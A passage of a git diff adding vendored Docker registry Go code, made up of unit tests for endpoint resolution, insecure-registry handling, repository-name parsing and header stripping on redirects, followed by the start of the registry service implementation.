Expected error for insecure index") + assertEqual(t, strings.Contains(err.Error(), "insecure-registry"), true, index.Name+": Expected insecure-registry error for insecure index") + index.Secure = false + } + + assertSecureIndex := func(index *registrytypes.IndexInfo) { + index.Secure = true + _, err := NewV1Endpoint(index, "", nil) + assertNotEqual(t, err, nil, index.Name+": Expected cert error for secure index") + assertEqual(t, strings.Contains(err.Error(), "certificate signed by unknown authority"), true, index.Name+": Expected cert error for secure index") + index.Secure = false + } + + index := ®istrytypes.IndexInfo{} + index.Name = makeURL("/v1/") + endpoint := expandEndpoint(index) + assertEqual(t, endpoint.String(), index.Name, "Expected endpoint to be "+index.Name) + assertInsecureIndex(index) + + index.Name = makeURL("") + endpoint = 
expandEndpoint(index)
+	assertEqual(t, endpoint.String(), index.Name+"/v1/", index.Name+": Expected endpoint to be "+index.Name+"/v1/")
+	assertInsecureIndex(index)
+
+	httpURL := makeURL("")
+	index.Name = strings.SplitN(httpURL, "://", 2)[1]
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), httpURL+"/v1/", index.Name+": Expected endpoint to be "+httpURL+"/v1/")
+	assertInsecureIndex(index)
+
+	index.Name = makeHTTPSURL("/v1/")
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), index.Name, "Expected endpoint to be "+index.Name)
+	assertSecureIndex(index)
+
+	index.Name = makeHTTPSURL("")
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), index.Name+"/v1/", index.Name+": Expected endpoint to be "+index.Name+"/v1/")
+	assertSecureIndex(index)
+
+	httpsURL := makeHTTPSURL("")
+	index.Name = strings.SplitN(httpsURL, "://", 2)[1]
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), httpsURL+"/v1/", index.Name+": Expected endpoint to be "+httpsURL+"/v1/")
+	assertSecureIndex(index)
+
+	badEndpoints := []string{
+		"http://127.0.0.1/v1/",
+		"https://127.0.0.1/v1/",
+		"http://127.0.0.1",
+		"https://127.0.0.1",
+		"127.0.0.1",
+	}
+	for _, address := range badEndpoints {
+		index.Name = address
+		_, err := NewV1Endpoint(index, "", nil)
+		checkNotEqual(t, err, nil, "Expected error while expanding bad endpoint")
+	}
+}
+
+func TestGetRemoteHistory(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	hist, err := r.GetRemoteHistory(imageID, makeURL("/v1/"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertEqual(t, len(hist), 2, "Expected 2 images in history")
+	assertEqual(t, hist[0], imageID, "Expected "+imageID+" as first ancestry")
+	assertEqual(t, hist[1], "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20",
+		"Unexpected second ancestry")
+}
+
+func TestLookupRemoteImage(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	err := r.LookupRemoteImage(imageID, makeURL("/v1/"))
+	
assertEqual(t, err, nil, "Expected error of remote lookup to nil") + if err := r.LookupRemoteImage("abcdef", makeURL("/v1/")); err == nil { + t.Fatal("Expected error of remote lookup to not nil") + } +} + +func TestGetRemoteImageJSON(t *testing.T) { + r := spawnTestRegistrySession(t) + json, size, err := r.GetRemoteImageJSON(imageID, makeURL("/v1/")) + if err != nil { + t.Fatal(err) + } + assertEqual(t, size, int64(154), "Expected size 154") + if len(json) == 0 { + t.Fatal("Expected non-empty json") + } + + _, _, err = r.GetRemoteImageJSON("abcdef", makeURL("/v1/")) + if err == nil { + t.Fatal("Expected image not found error") + } +} + +func TestGetRemoteImageLayer(t *testing.T) { + r := spawnTestRegistrySession(t) + data, err := r.GetRemoteImageLayer(imageID, makeURL("/v1/"), 0) + if err != nil { + t.Fatal(err) + } + if data == nil { + t.Fatal("Expected non-nil data result") + } + + _, err = r.GetRemoteImageLayer("abcdef", makeURL("/v1/"), 0) + if err == nil { + t.Fatal("Expected image not found error") + } +} + +func TestGetRemoteTag(t *testing.T) { + r := spawnTestRegistrySession(t) + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + tag, err := r.GetRemoteTag([]string{makeURL("/v1/")}, repoRef, "test") + if err != nil { + t.Fatal(err) + } + assertEqual(t, tag, imageID, "Expected tag test to map to "+imageID) + + bazRef, err := reference.ParseNamed("foo42/baz") + if err != nil { + t.Fatal(err) + } + _, err = r.GetRemoteTag([]string{makeURL("/v1/")}, bazRef, "foo") + if err != ErrRepoNotFound { + t.Fatal("Expected ErrRepoNotFound error when fetching tag for bogus repo") + } +} + +func TestGetRemoteTags(t *testing.T) { + r := spawnTestRegistrySession(t) + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + tags, err := r.GetRemoteTags([]string{makeURL("/v1/")}, repoRef) + if err != nil { + t.Fatal(err) + } + assertEqual(t, len(tags), 2, "Expected two tags") + assertEqual(t, tags["latest"], imageID, 
"Expected tag latest to map to "+imageID)
+	assertEqual(t, tags["test"], imageID, "Expected tag test to map to "+imageID)
+
+	bazRef, err := reference.ParseNamed("foo42/baz")
+	if err != nil {
+		t.Fatal(err)
+	}
+	_, err = r.GetRemoteTags([]string{makeURL("/v1/")}, bazRef)
+	if err != ErrRepoNotFound {
+		t.Fatal("Expected ErrRepoNotFound error when fetching tags for bogus repo")
+	}
+}
+
+func TestGetRepositoryData(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	parsedURL, err := url.Parse(makeURL("/v1/"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	host := "http://" + parsedURL.Host + "/v1/"
+	repoRef, err := reference.ParseNamed(REPO)
+	if err != nil {
+		t.Fatal(err)
+	}
+	data, err := r.GetRepositoryData(repoRef)
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertEqual(t, len(data.ImgList), 2, "Expected 2 images in ImgList")
+	assertEqual(t, len(data.Endpoints), 2,
+		fmt.Sprintf("Expected 2 endpoints in Endpoints, found %d instead", len(data.Endpoints)))
+	assertEqual(t, data.Endpoints[0], host,
+		fmt.Sprintf("Expected first endpoint to be %s but found %s instead", host, data.Endpoints[0]))
+	assertEqual(t, data.Endpoints[1], "http://test.example.com/v1/",
+		fmt.Sprintf("Expected second endpoint to be http://test.example.com/v1/ but found %s instead", data.Endpoints[1]))
+
+}
+
+func TestPushImageJSONRegistry(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	imgData := &ImgData{
+		ID:       "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20",
+		Checksum: "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37",
+	}
+
+	err := r.PushImageJSONRegistry(imgData, []byte{0x42, 0xdf, 0x0}, makeURL("/v1/"))
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestPushImageLayerRegistry(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	layer := strings.NewReader("")
+	_, _, err := r.PushImageLayerRegistry(imageID, layer, makeURL("/v1/"), []byte{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestParseRepositoryInfo(t *testing.T) {
+	type 
staticRepositoryInfo struct { + Index *registrytypes.IndexInfo + RemoteName string + CanonicalName string + LocalName string + Official bool + } + + expectedRepoInfos := map[string]staticRepositoryInfo{ + "fooo/bar": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "fooo/bar", + LocalName: "fooo/bar", + CanonicalName: "docker.io/fooo/bar", + Official: false, + }, + "library/ubuntu": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu", + LocalName: "ubuntu", + CanonicalName: "docker.io/library/ubuntu", + Official: true, + }, + "nonlibrary/ubuntu": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "nonlibrary/ubuntu", + LocalName: "nonlibrary/ubuntu", + CanonicalName: "docker.io/nonlibrary/ubuntu", + Official: false, + }, + "ubuntu": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu", + LocalName: "ubuntu", + CanonicalName: "docker.io/library/ubuntu", + Official: true, + }, + "other/library": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "other/library", + LocalName: "other/library", + CanonicalName: "docker.io/other/library", + Official: false, + }, + "127.0.0.1:8000/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "127.0.0.1:8000", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: "127.0.0.1:8000/private/moonbase", + CanonicalName: "127.0.0.1:8000/private/moonbase", + Official: false, + }, + "127.0.0.1:8000/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "127.0.0.1:8000", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "127.0.0.1:8000/privatebase", + CanonicalName: "127.0.0.1:8000/privatebase", + Official: false, + }, + "localhost:8000/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "localhost:8000", + Official: false, + }, + RemoteName: "private/moonbase", + 
LocalName: "localhost:8000/private/moonbase", + CanonicalName: "localhost:8000/private/moonbase", + Official: false, + }, + "localhost:8000/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "localhost:8000", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "localhost:8000/privatebase", + CanonicalName: "localhost:8000/privatebase", + Official: false, + }, + "example.com/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "example.com", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: "example.com/private/moonbase", + CanonicalName: "example.com/private/moonbase", + Official: false, + }, + "example.com/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "example.com", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "example.com/privatebase", + CanonicalName: "example.com/privatebase", + Official: false, + }, + "example.com:8000/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "example.com:8000", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: "example.com:8000/private/moonbase", + CanonicalName: "example.com:8000/private/moonbase", + Official: false, + }, + "example.com:8000/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "example.com:8000", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "example.com:8000/privatebase", + CanonicalName: "example.com:8000/privatebase", + Official: false, + }, + "localhost/private/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: "localhost", + Official: false, + }, + RemoteName: "private/moonbase", + LocalName: "localhost/private/moonbase", + CanonicalName: "localhost/private/moonbase", + Official: false, + }, + "localhost/privatebase": { + Index: ®istrytypes.IndexInfo{ + Name: "localhost", + Official: false, + }, + RemoteName: "privatebase", + LocalName: "localhost/privatebase", + CanonicalName: "localhost/privatebase", + Official: false, + }, + IndexName + "/public/moonbase": { + Index: 
®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "public/moonbase", + LocalName: "public/moonbase", + CanonicalName: "docker.io/public/moonbase", + Official: false, + }, + "index." + IndexName + "/public/moonbase": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "public/moonbase", + LocalName: "public/moonbase", + CanonicalName: "docker.io/public/moonbase", + Official: false, + }, + "ubuntu-12.04-base": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu-12.04-base", + LocalName: "ubuntu-12.04-base", + CanonicalName: "docker.io/library/ubuntu-12.04-base", + Official: true, + }, + IndexName + "/ubuntu-12.04-base": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu-12.04-base", + LocalName: "ubuntu-12.04-base", + CanonicalName: "docker.io/library/ubuntu-12.04-base", + Official: true, + }, + "index." + IndexName + "/ubuntu-12.04-base": { + Index: ®istrytypes.IndexInfo{ + Name: IndexName, + Official: true, + }, + RemoteName: "library/ubuntu-12.04-base", + LocalName: "ubuntu-12.04-base", + CanonicalName: "docker.io/library/ubuntu-12.04-base", + Official: true, + }, + } + + for reposName, expectedRepoInfo := range expectedRepoInfos { + named, err := reference.WithName(reposName) + if err != nil { + t.Error(err) + } + + repoInfo, err := ParseRepositoryInfo(named) + if err != nil { + t.Error(err) + } else { + checkEqual(t, repoInfo.Index.Name, expectedRepoInfo.Index.Name, reposName) + checkEqual(t, repoInfo.RemoteName(), expectedRepoInfo.RemoteName, reposName) + checkEqual(t, repoInfo.Name(), expectedRepoInfo.LocalName, reposName) + checkEqual(t, repoInfo.FullName(), expectedRepoInfo.CanonicalName, reposName) + checkEqual(t, repoInfo.Index.Official, expectedRepoInfo.Index.Official, reposName) + checkEqual(t, repoInfo.Official, expectedRepoInfo.Official, reposName) + } + } +} + +func 
TestNewIndexInfo(t *testing.T) { + testIndexInfo := func(config *serviceConfig, expectedIndexInfos map[string]*registrytypes.IndexInfo) { + for indexName, expectedIndexInfo := range expectedIndexInfos { + index, err := newIndexInfo(config, indexName) + if err != nil { + t.Fatal(err) + } else { + checkEqual(t, index.Name, expectedIndexInfo.Name, indexName+" name") + checkEqual(t, index.Official, expectedIndexInfo.Official, indexName+" is official") + checkEqual(t, index.Secure, expectedIndexInfo.Secure, indexName+" is secure") + checkEqual(t, len(index.Mirrors), len(expectedIndexInfo.Mirrors), indexName+" mirrors") + } + } + } + + config := newServiceConfig(ServiceOptions{}) + noMirrors := []string{} + expectedIndexInfos := map[string]*registrytypes.IndexInfo{ + IndexName: { + Name: IndexName, + Official: true, + Secure: true, + Mirrors: noMirrors, + }, + "index." + IndexName: { + Name: IndexName, + Official: true, + Secure: true, + Mirrors: noMirrors, + }, + "example.com": { + Name: "example.com", + Official: false, + Secure: true, + Mirrors: noMirrors, + }, + "127.0.0.1:5000": { + Name: "127.0.0.1:5000", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + } + testIndexInfo(config, expectedIndexInfos) + + publicMirrors := []string{"http://mirror1.local", "http://mirror2.local"} + config = makeServiceConfig(publicMirrors, []string{"example.com"}) + + expectedIndexInfos = map[string]*registrytypes.IndexInfo{ + IndexName: { + Name: IndexName, + Official: true, + Secure: true, + Mirrors: publicMirrors, + }, + "index." 
+ IndexName: { + Name: IndexName, + Official: true, + Secure: true, + Mirrors: publicMirrors, + }, + "example.com": { + Name: "example.com", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "example.com:5000": { + Name: "example.com:5000", + Official: false, + Secure: true, + Mirrors: noMirrors, + }, + "127.0.0.1": { + Name: "127.0.0.1", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "127.0.0.1:5000": { + Name: "127.0.0.1:5000", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "other.com": { + Name: "other.com", + Official: false, + Secure: true, + Mirrors: noMirrors, + }, + } + testIndexInfo(config, expectedIndexInfos) + + config = makeServiceConfig(nil, []string{"42.42.0.0/16"}) + expectedIndexInfos = map[string]*registrytypes.IndexInfo{ + "example.com": { + Name: "example.com", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "example.com:5000": { + Name: "example.com:5000", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "127.0.0.1": { + Name: "127.0.0.1", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "127.0.0.1:5000": { + Name: "127.0.0.1:5000", + Official: false, + Secure: false, + Mirrors: noMirrors, + }, + "other.com": { + Name: "other.com", + Official: false, + Secure: true, + Mirrors: noMirrors, + }, + } + testIndexInfo(config, expectedIndexInfos) +} + +func TestMirrorEndpointLookup(t *testing.T) { + containsMirror := func(endpoints []APIEndpoint) bool { + for _, pe := range endpoints { + if pe.URL.Host == "my.mirror" { + return true + } + } + return false + } + s := DefaultService{config: makeServiceConfig([]string{"my.mirror"}, nil)} + + imageName, err := reference.WithName(IndexName + "/test/image") + if err != nil { + t.Error(err) + } + pushAPIEndpoints, err := s.LookupPushEndpoints(imageName.Hostname()) + if err != nil { + t.Fatal(err) + } + if containsMirror(pushAPIEndpoints) { + t.Fatal("Push endpoint should not contain mirror") + } + + 
pullAPIEndpoints, err := s.LookupPullEndpoints(imageName.Hostname()) + if err != nil { + t.Fatal(err) + } + if !containsMirror(pullAPIEndpoints) { + t.Fatal("Pull endpoint should contain mirror") + } +} + +func TestPushRegistryTag(t *testing.T) { + r := spawnTestRegistrySession(t) + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + err = r.PushRegistryTag(repoRef, imageID, "stable", makeURL("/v1/")) + if err != nil { + t.Fatal(err) + } +} + +func TestPushImageJSONIndex(t *testing.T) { + r := spawnTestRegistrySession(t) + imgData := []*ImgData{ + { + ID: "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20", + Checksum: "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37", + }, + { + ID: "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d", + Checksum: "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2", + }, + } + repoRef, err := reference.ParseNamed(REPO) + if err != nil { + t.Fatal(err) + } + repoData, err := r.PushImageJSONIndex(repoRef, imgData, false, nil) + if err != nil { + t.Fatal(err) + } + if repoData == nil { + t.Fatal("Expected RepositoryData object") + } + repoData, err = r.PushImageJSONIndex(repoRef, imgData, true, []string{r.indexEndpoint.String()}) + if err != nil { + t.Fatal(err) + } + if repoData == nil { + t.Fatal("Expected RepositoryData object") + } +} + +func TestSearchRepositories(t *testing.T) { + r := spawnTestRegistrySession(t) + results, err := r.SearchRepositories("fakequery", 25) + if err != nil { + t.Fatal(err) + } + if results == nil { + t.Fatal("Expected non-nil SearchResults object") + } + assertEqual(t, results.NumResults, 1, "Expected 1 search results") + assertEqual(t, results.Query, "fakequery", "Expected 'fakequery' as query") + assertEqual(t, results.Results[0].StarCount, 42, "Expected 'fakeimage' to have 42 stars") +} + +func TestTrustedLocation(t *testing.T) { + for _, url := range []string{"http://example.com", 
"https://example.com:7777", "http://docker.io", "http://test.docker.com", "https://fakedocker.com"} { + req, _ := http.NewRequest("GET", url, nil) + if trustedLocation(req) == true { + t.Fatalf("'%s' shouldn't be detected as a trusted location", url) + } + } + + for _, url := range []string{"https://docker.io", "https://test.docker.com:80"} { + req, _ := http.NewRequest("GET", url, nil) + if trustedLocation(req) == false { + t.Fatalf("'%s' should be detected as a trusted location", url) + } + } +} + +func TestAddRequiredHeadersToRedirectedRequests(t *testing.T) { + for _, urls := range [][]string{ + {"http://docker.io", "https://docker.com"}, + {"https://foo.docker.io:7777", "http://bar.docker.com"}, + {"https://foo.docker.io", "https://example.com"}, + } { + reqFrom, _ := http.NewRequest("GET", urls[0], nil) + reqFrom.Header.Add("Content-Type", "application/json") + reqFrom.Header.Add("Authorization", "super_secret") + reqTo, _ := http.NewRequest("GET", urls[1], nil) + + addRequiredHeadersToRedirectedRequests(reqTo, []*http.Request{reqFrom}) + + if len(reqTo.Header) != 1 { + t.Fatalf("Expected 1 headers, got %d", len(reqTo.Header)) + } + + if reqTo.Header.Get("Content-Type") != "application/json" { + t.Fatal("'Content-Type' should be 'application/json'") + } + + if reqTo.Header.Get("Authorization") != "" { + t.Fatal("'Authorization' should be empty") + } + } + + for _, urls := range [][]string{ + {"https://docker.io", "https://docker.com"}, + {"https://foo.docker.io:7777", "https://bar.docker.com"}, + } { + reqFrom, _ := http.NewRequest("GET", urls[0], nil) + reqFrom.Header.Add("Content-Type", "application/json") + reqFrom.Header.Add("Authorization", "super_secret") + reqTo, _ := http.NewRequest("GET", urls[1], nil) + + addRequiredHeadersToRedirectedRequests(reqTo, []*http.Request{reqFrom}) + + if len(reqTo.Header) != 2 { + t.Fatalf("Expected 2 headers, got %d", len(reqTo.Header)) + } + + if reqTo.Header.Get("Content-Type") != "application/json" { + 
t.Fatal("'Content-Type' should be 'application/json'") + } + + if reqTo.Header.Get("Authorization") != "super_secret" { + t.Fatal("'Authorization' should be 'super_secret'") + } + } +} + +func TestIsSecureIndex(t *testing.T) { + tests := []struct { + addr string + insecureRegistries []string + expected bool + }{ + {IndexName, nil, true}, + {"example.com", []string{}, true}, + {"example.com", []string{"example.com"}, false}, + {"localhost", []string{"localhost:5000"}, false}, + {"localhost:5000", []string{"localhost:5000"}, false}, + {"localhost", []string{"example.com"}, false}, + {"127.0.0.1:5000", []string{"127.0.0.1:5000"}, false}, + {"localhost", nil, false}, + {"localhost:5000", nil, false}, + {"127.0.0.1", nil, false}, + {"localhost", []string{"example.com"}, false}, + {"127.0.0.1", []string{"example.com"}, false}, + {"example.com", nil, true}, + {"example.com", []string{"example.com"}, false}, + {"127.0.0.1", []string{"example.com"}, false}, + {"127.0.0.1:5000", []string{"example.com"}, false}, + {"example.com:5000", []string{"42.42.0.0/16"}, false}, + {"example.com", []string{"42.42.0.0/16"}, false}, + {"example.com:5000", []string{"42.42.42.42/8"}, false}, + {"127.0.0.1:5000", []string{"127.0.0.0/8"}, false}, + {"42.42.42.42:5000", []string{"42.1.1.1/8"}, false}, + {"invalid.domain.com", []string{"42.42.0.0/16"}, true}, + {"invalid.domain.com", []string{"invalid.domain.com"}, false}, + {"invalid.domain.com:5000", []string{"invalid.domain.com"}, true}, + {"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, false}, + } + for _, tt := range tests { + config := makeServiceConfig(nil, tt.insecureRegistries) + if sec := isSecureIndex(config, tt.addr); sec != tt.expected { + t.Errorf("isSecureIndex failed for %q %v, expected %v got %v", tt.addr, tt.insecureRegistries, tt.expected, sec) + } + } +} + +type debugTransport struct { + http.RoundTripper + log func(...interface{}) +} + +func (tr debugTransport) RoundTrip(req *http.Request) (*http.Response, 
error) { + dump, err := httputil.DumpRequestOut(req, false) + if err != nil { + tr.log("could not dump request") + } + tr.log(string(dump)) + resp, err := tr.RoundTripper.RoundTrip(req) + if err != nil { + return nil, err + } + dump, err = httputil.DumpResponse(resp, false) + if err != nil { + tr.log("could not dump response") + } + tr.log(string(dump)) + return resp, err +} diff --git a/vendor/github.com/docker/docker/registry/service.go b/vendor/github.com/docker/docker/registry/service.go new file mode 100644 index 0000000000..596a9c7e5f --- /dev/null +++ b/vendor/github.com/docker/docker/registry/service.go @@ -0,0 +1,304 @@ +package registry + +import ( + "crypto/tls" + "fmt" + "net/http" + "net/url" + "strings" + "sync" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/docker/api/types" + registrytypes "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/reference" +) + +const ( + // DefaultSearchLimit is the default value for maximum number of returned search results. + DefaultSearchLimit = 25 +) + +// Service is the interface defining what a registry service should implement. +type Service interface { + Auth(ctx context.Context, authConfig *types.AuthConfig, userAgent string) (status, token string, err error) + LookupPullEndpoints(hostname string) (endpoints []APIEndpoint, err error) + LookupPushEndpoints(hostname string) (endpoints []APIEndpoint, err error) + ResolveRepository(name reference.Named) (*RepositoryInfo, error) + Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) + ServiceConfig() *registrytypes.ServiceConfig + TLSConfig(hostname string) (*tls.Config, error) + LoadInsecureRegistries([]string) error +} + +// DefaultService is a registry service. It tracks configuration data such as a list +// of mirrors. 
+type DefaultService struct { + config *serviceConfig + mu sync.Mutex +} + +// NewService returns a new instance of DefaultService ready to be +// installed into an engine. +func NewService(options ServiceOptions) *DefaultService { + return &DefaultService{ + config: newServiceConfig(options), + } +} + +// ServiceConfig returns the public registry service configuration. +func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig { + s.mu.Lock() + defer s.mu.Unlock() + + servConfig := registrytypes.ServiceConfig{ + InsecureRegistryCIDRs: make([]*(registrytypes.NetIPNet), 0), + IndexConfigs: make(map[string]*(registrytypes.IndexInfo)), + Mirrors: make([]string, 0), + } + + // construct a new ServiceConfig which will not retrieve s.Config directly, + // and look up items in s.config with mu locked + servConfig.InsecureRegistryCIDRs = append(servConfig.InsecureRegistryCIDRs, s.config.ServiceConfig.InsecureRegistryCIDRs...) + + for key, value := range s.config.ServiceConfig.IndexConfigs { + servConfig.IndexConfigs[key] = value + } + + servConfig.Mirrors = append(servConfig.Mirrors, s.config.ServiceConfig.Mirrors...) + + return &servConfig +} + +// LoadInsecureRegistries loads insecure registries for Service +func (s *DefaultService) LoadInsecureRegistries(registries []string) error { + s.mu.Lock() + defer s.mu.Unlock() + + return s.config.LoadInsecureRegistries(registries) +} + +// Auth contacts the public registry with the provided credentials, +// and returns OK if authentication was successful. +// It can be used to verify the validity of a client's credentials. 
+func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig, userAgent string) (status, token string, err error) { + // TODO Use ctx when searching for repositories + serverAddress := authConfig.ServerAddress + if serverAddress == "" { + serverAddress = IndexServer + } + if !strings.HasPrefix(serverAddress, "https://") && !strings.HasPrefix(serverAddress, "http://") { + serverAddress = "https://" + serverAddress + } + u, err := url.Parse(serverAddress) + if err != nil { + return "", "", fmt.Errorf("unable to parse server address: %v", err) + } + + endpoints, err := s.LookupPushEndpoints(u.Host) + if err != nil { + return "", "", err + } + + for _, endpoint := range endpoints { + login := loginV2 + if endpoint.Version == APIVersion1 { + login = loginV1 + } + + status, token, err = login(authConfig, endpoint, userAgent) + if err == nil { + return + } + if fErr, ok := err.(fallbackError); ok { + err = fErr.err + logrus.Infof("Error logging in to %s endpoint, trying next endpoint: %v", endpoint.Version, err) + continue + } + return "", "", err + } + + return "", "", err +} + +// splitReposSearchTerm breaks a search term into an index name and remote name +func splitReposSearchTerm(reposName string) (string, string) { + nameParts := strings.SplitN(reposName, "/", 2) + var indexName, remoteName string + if len(nameParts) == 1 || (!strings.Contains(nameParts[0], ".") && + !strings.Contains(nameParts[0], ":") && nameParts[0] != "localhost") { + // This is a Docker Index repos (ex: samalba/hipache or ubuntu) + // 'docker.io' + indexName = IndexName + remoteName = reposName + } else { + indexName = nameParts[0] + remoteName = nameParts[1] + } + return indexName, remoteName +} + +// Search queries the public registry for images matching the specified +// search terms, and returns the results. 
+func (s *DefaultService) Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) { + // TODO Use ctx when searching for repositories + if err := validateNoScheme(term); err != nil { + return nil, err + } + + indexName, remoteName := splitReposSearchTerm(term) + + // Search is a long-running operation, just lock s.config to avoid block others. + s.mu.Lock() + index, err := newIndexInfo(s.config, indexName) + s.mu.Unlock() + + if err != nil { + return nil, err + } + + // *TODO: Search multiple indexes. + endpoint, err := NewV1Endpoint(index, userAgent, http.Header(headers)) + if err != nil { + return nil, err + } + + var client *http.Client + if authConfig != nil && authConfig.IdentityToken != "" && authConfig.Username != "" { + creds := NewStaticCredentialStore(authConfig) + scopes := []auth.Scope{ + auth.RegistryScope{ + Name: "catalog", + Actions: []string{"search"}, + }, + } + + modifiers := DockerHeaders(userAgent, nil) + v2Client, foundV2, err := v2AuthHTTPClient(endpoint.URL, endpoint.client.Transport, modifiers, creds, scopes) + if err != nil { + if fErr, ok := err.(fallbackError); ok { + logrus.Errorf("Cannot use identity token for search, v2 auth not supported: %v", fErr.err) + } else { + return nil, err + } + } else if foundV2 { + // Copy non transport http client features + v2Client.Timeout = endpoint.client.Timeout + v2Client.CheckRedirect = endpoint.client.CheckRedirect + v2Client.Jar = endpoint.client.Jar + + logrus.Debugf("using v2 client for search to %s", endpoint.URL) + client = v2Client + } + } + + if client == nil { + client = endpoint.client + if err := authorizeClient(client, authConfig, endpoint); err != nil { + return nil, err + } + } + + r := newSession(client, authConfig, endpoint) + + if index.Official { + localName := remoteName + if strings.HasPrefix(localName, "library/") { + // If pull "library/foo", it's stored locally under 
"foo" + localName = strings.SplitN(localName, "/", 2)[1] + } + + return r.SearchRepositories(localName, limit) + } + return r.SearchRepositories(remoteName, limit) +} + +// ResolveRepository splits a repository name into its components +// and configuration of the associated registry. +func (s *DefaultService) ResolveRepository(name reference.Named) (*RepositoryInfo, error) { + s.mu.Lock() + defer s.mu.Unlock() + return newRepositoryInfo(s.config, name) +} + +// APIEndpoint represents a remote API endpoint +type APIEndpoint struct { + Mirror bool + URL *url.URL + Version APIVersion + Official bool + TrimHostname bool + TLSConfig *tls.Config +} + +// ToV1Endpoint returns a V1 API endpoint based on the APIEndpoint +func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { + return newV1Endpoint(*e.URL, e.TLSConfig, userAgent, metaHeaders) +} + +// TLSConfig constructs a client TLS configuration based on server defaults +func (s *DefaultService) TLSConfig(hostname string) (*tls.Config, error) { + s.mu.Lock() + defer s.mu.Unlock() + + return newTLSConfig(hostname, isSecureIndex(s.config, hostname)) +} + +// tlsConfig constructs a client TLS configuration based on server defaults +func (s *DefaultService) tlsConfig(hostname string) (*tls.Config, error) { + return newTLSConfig(hostname, isSecureIndex(s.config, hostname)) +} + +func (s *DefaultService) tlsConfigForMirror(mirrorURL *url.URL) (*tls.Config, error) { + return s.tlsConfig(mirrorURL.Host) +} + +// LookupPullEndpoints creates a list of endpoints to try to pull from, in order of preference. +// It gives preference to v2 endpoints over v1, mirrors over the actual +// registry, and HTTPS over plain HTTP. 
